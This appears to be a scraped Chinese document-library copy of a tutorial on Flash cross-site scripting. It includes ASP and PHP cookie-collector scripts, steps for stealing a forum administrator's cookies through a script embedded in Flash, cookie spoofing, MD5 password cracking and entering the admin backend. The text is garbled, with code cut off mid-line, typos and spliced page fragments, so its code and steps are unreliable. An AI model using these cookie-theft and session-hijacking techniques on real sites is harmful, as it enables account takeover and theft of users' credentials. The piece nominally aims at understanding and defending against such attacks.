解析flash跨站脚本攻击

《解析flash跨站脚本攻击》由会员上传分享，免费在线阅读，更多相关内容在工程资料-天天文库。

1、解析Flash跨站脚本攻击～教育资源库　　Flash跨站攻击是当下比较流行的跨站攻击手段，且没有很好的预防办法。在它的淫威下有多少网站倒下了，站长们对此叫苦不迭。下面我们就看看Flash跨站脚本攻击到底是如何实现的，知己知彼，然后找到应对措施。　　虚拟机部署如下测试环境：　　操作系统：l代码中插人的其有恶意目的的数据，用户认为该页面是可信赖的，但是当浏览器下载该页面，嵌入其中的脚本将被解释执行，有时候跨站脚本被称为XSS，这是因为CSS一般被称为分层样式表，这很容易让人困惑，如果你听某人提到CSS或XSS安全漏洞，通常指的都是跨站脚本

2、。Flash跨站攻击是在Flash文件中插入脚本，在播放flash文件的时候脚本被触发，然后通过脚本获取用户的敏感信息或者打开具有网页木马的URL页面从而实现攻击。　　一、准备　　(一)准备脚本　　1、ASP脚本　　第一步：构造攻击脚本　　打开记事本输入如下代码输入并保存为cookies_flash.asp:<%testfile=server.mappath(cookies.txt)msg=request(msg)setfs=server.createobject(scripting.filesystemobject)setth

3、isfile=fs.opentextfile(testfile,8,true,0)thisfile.p;msg$)thisfile=closesetfs=nothing%>　　第二步：把cookies_flash.asp上传到支持asp的空间，我们就把它复制到测试环境的论坛根目录下，URL地址为：　　192.168.0.5/flash/cookies_flash.asp　　2、PHP脚本　　第一步：PHP论坛和ASP论坛一样，把如下代码保存为cookies_flash.php：<?php$info=getenv('

4、query_srring');if(info){$fp=fopen('cookies.txt,'a');fent.cookie'));　　图1　　第二步：导出影片为cookies.sin登录，然后浏览刚才发的帖子，打开flash。这样管理员的相关信息由flash脚本通过cookies_flash.asp文件及其相关参数，写入了192.168.0.5/flash/cookies.txt文件中。(图3)　　图3　　2.信息利用　　(1)得到cookies后可以通过cookies欺骗12下一页友情提醒

5、：，特别！，修改本机的有关flash_test用户的cookies信息为admin的，就可以欺骗进入论坛后台。这个就不演示了。　　(2)通过工具爆破admin管理员密码的MD5加密值x1sfv3h775D5值破解起来就会增加难度。　　3.进入论坛后台　　利用刚才得到的管理员密码，先在前台登录然后点击管理按钮输入用户名和密码成功进入后台。(图5)　　图5　　4.得到in.asp?username=lilyID=efb9c819-53ff-4f82-bfaf-e11625130c25DisplayLang=en　　总结：Flash跨站攻击

6、手段多样，要有效预防是比较困难的，提高自身的安全意识才是关键。其实网络中的攻击除了技术之外，利用最多的就是使用者的疏忽大意，突破了用户这道防线，任何安全措施都失去了作用，这就是网络安全中的木桶原理吧。上一页12友情提醒：，特别！